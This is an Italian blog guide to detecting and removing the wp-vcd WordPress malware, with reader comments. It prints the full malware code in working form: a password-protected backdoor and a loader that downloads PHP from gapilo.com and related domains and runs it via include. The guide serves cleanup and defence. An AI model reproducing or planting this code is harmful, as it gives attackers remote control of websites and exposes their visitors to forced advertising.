Stai navigando sul tuo sito e se clicchi ovunque si aprono dei pop-up o pubblicità ? Mi dispiace per te ma hai preso un malware. Segui la mia guida così potrai risparmiare un sacco di soldi ed è veramente facile rimuovere questo malware.
Quali cartelle o file “colpisce” Questo malware?
Questo malware colpisce la cartella wp-includes e il file functions.php del proprio tema. Questa backdoor “prende il controllo” di wordpress dal file functions. Questo script malevolo fa in modo che l’ utente quando visita il sito,che magari clicca su qualcosa, Si aprono pagine e pagine di pubblicità indesiderata.
Come controllo il mio sito?
Guarda è facile! Per prima cosa accedi al tuo pannello di controllo dell’ hosting (Plesk,cPanel,Webmin,DirectAdmin,eccc..) oppure accedi ai tuoi file trammite FTP (usa qualsiasi software per ftp ad esempio Filezilla). Vai nella cartella dove è installato wordpess(dipende dal hosting ma di solito è public_html, httpdocs, nomesito, ecc…), Adesso vai su WP-INCLUDES poi scorri tutti i file e se trovi i file: ” wp-feed.php” , “wp-tmp.php” e ” wp-vcd.php” vuol dire che hai preso il malware. Un’ altro controllo da fare è quello di andare su WP-CONTENT/THEMES/NOMEDELTEMA e aprire il file functions.php. Se nelle prime righe di codice ti trovi questo:
<?php
if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘1f501615e985a65b627398d427c88767’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{ ecc…ec…
Vuol dire che il malware ti ha colpito. Ma stai tranquillo! Adesso ti spiegherò la modalità per rimuovere questo malware.
Come rimuovo il malware?
Innanzitutto devi eliminare i file: “wp-feed.php“, “wp-tmp.php” e ” wp-vcd.php” dalla cartella wp-Includes. Adesso il passaggio sucessivo è molto importante! Una volta eliminato i file vai sulla cartella wp-content poi su theme e clicca sul nome del tuo tema(ad. esempio: enfold,betheme,ecc). Appena hai aperto la cartella cerca il file functions.php, aprilo o scaricalo(dipende dal pannello di controllo, certi pannelli hanno un editor, se il tuo non c’ è l’ ha scarica il file e una volta modificato caricalo di nuovo). Aprilo con un qualsiasi editor ed elimina le righe da <?php a ?>. Dopo di questo simbolo: ?> c’ è un altro <?php (QUESTO NON DEVI ELIMINARLO!) DOPO QUESTO INIZIA IL CODICE COMMENTATO DEL TEMA(i commenti sono quelli che iniziano con //).
Clicca qui per vedere dove eliminare il codice malevolo
In poche parole devi eliminare dalla prima riga fino dove trovi ?> (NON QUELLO A FONDO PAGINA!)
Se hai seguito questa procedura sei riuscito a rimuovere il malware dal tuo sito! Se non riesci a farlo oppure hai paura di creare qualche danno contattami subito e io ti aiuterò oppure ti toglierò il malware (Ovviamente il tutto è gratuito).
Una volta fatto ciò installa un buon antivirus nel tuo sito. Installa wordfence(clicca qui)
Ecco il codice completo del malware(Possono cambiare solo le key e basta)
<?php
if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘1f501615e985a65b627398d427c88767’))
{
$div_code_name=”wp_vcd”;
switch ($_REQUEST[‘action’])
{case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’]))
{if (!empty($_REQUEST[‘newdomain’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code\.php/i’,$file,$matcholddomain))
{$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(__FILE__, $file);
print “true”;
}}
}
}
break;case ‘change_code’;
if (isset($_REQUEST[‘newcode’]))
{if (!empty($_REQUEST[‘newcode’]))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all(‘/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i’,$file,$matcholdcode))
{$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST[‘newcode’]), $file);
@file_put_contents(__FILE__, $file);
print “true”;
}}
}
}
break;default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
}die(“”);
}$div_code_name = “wp_vcd”;
$funcfile = __FILE__;
if(!function_exists(‘theme_temp_setup’)) {
$path = $_SERVER[‘HTTP_HOST’] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
if( fwrite($handle, “<?php\n” . $phpCode))
{
}
else
{
$tmpfname = tempnam(‘./’, “theme_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}$wp_auth_key=’671f55202565d8b7050045e7ae0d758c’;
if (($tmpcontent = @file_get_contents(“http://www.gapilo.com/code.php”) OR $tmpcontent = @file_get_contents_tcurl(“http://www.gapilo.com/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}}
}elseif ($tmpcontent = @file_get_contents(“http://www.gapilo.pw/code.php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}}
}elseif ($tmpcontent = @file_get_contents(“http://www.gapilo.top/code.php”) AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . ‘wp-includes/wp-tmp.php’, $tmpcontent);if (!file_exists(ABSPATH . ‘wp-includes/wp-tmp.php’)) {
@file_put_contents(get_template_directory() . ‘/wp-tmp.php’, $tmpcontent);
if (!file_exists(get_template_directory() . ‘/wp-tmp.php’)) {
@file_put_contents(‘wp-tmp.php’, $tmpcontent);
}
}}
}
elseif ($tmpcontent = @file_get_contents(ABSPATH . ‘wp-includes/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));} elseif ($tmpcontent = @file_get_contents(get_template_directory() . ‘/wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));} elseif ($tmpcontent = @file_get_contents(‘wp-tmp.php’) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));}
}
}//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>
Giugno 29, 2019, 6:30 am
Grazie ! era esattamente il mio problema, e con la tua guida sono riuscito a risolverlo
Giugno 29, 2019, 10:41 am
Ciao sono molto contento del tuo feedback! Se ti va lascia un like alla mia pagina Facebook
Giugno 29, 2019, 6:57 am
ps: hai dimenticato di segnalare di rimuovere anche il file wp-vcd.php , che una volta esaminato ha evidenti richiami simili di codici malware
Giugno 29, 2019, 10:41 am
Grazie per avermi avvisato, ho dimenticato solo questo piccolo particolare. Ora modifico.
Agosto 25, 2019, 1:26 pm
Ciao Nicola ho seguito alla lettera le indicazioni da te suggerite ma dopo una scansione con Wordfence trova ancora codice malevolo dopo la > nei file funcions.php (io nel template ne ho 3) e precisamente:
<?
Puoi cortesemente suggerirmi cosa fare? Grazie.
Agosto 25, 2019, 1:28 pm
Ciao mandami il file functions.php via mail: [email protected] così lo controllo ;D
Agosto 25, 2019, 1:46 pm
Inviato
Agosto 28, 2019, 9:52 pm
Ciao, ho eseguito alla letter i tuoi consigli, nonostante ciò il malware è ancora presente o meglio, si è rigenerato.
Ho sucuri come antivirus e intatti mi risulta ancora il file wp-tmp.php, non so più come fare. Inoltre sempre da sucuri vedo il file ver.php come possibile hack
ti mando screen https://imgur.com/SdlZyqf
Agosto 29, 2019, 4:51 am
Ciao inviami il file in questione è il functions via mail: [email protected].
Settembre 4, 2019, 2:39 pm
a quanto pare controllate anche il file post.php
c’è un INCLUDE dentro ora
Settembre 8, 2019, 7:40 pm
Ciao si me ne sono accorto anche io. Infatti prossima settimana esce un’ articolo con tutto quello che riguarda questo malware. Diciamo una versione 2.0 del malware 😀
Settembre 23, 2019, 3:56 pm
Ciao ‘) dove perpiacere?
Settembre 23, 2019, 5:25 pm
Ciao cosa intendi?? Se ti va scrivimi sulla chat di Facebook 😀
Maggio 24, 2020, 4:51 pm
Maggio 24, 2020, 8:22 pm
Ciao Grazie a te. Ho letto il tuo articolo, molto bello ed utile
Luglio 9, 2020, 2:49 pm
Ciao!
Ottima spiegazione! Problema Risolto! grazie!
Luglio 9, 2020, 3:21 pm
Ciao. Perfetto! 😀
Settembre 9, 2020, 10:39 am
Grazie per la guida, è stata utilissima!
Settembre 15, 2020, 10:03 am
Grazie a te 😀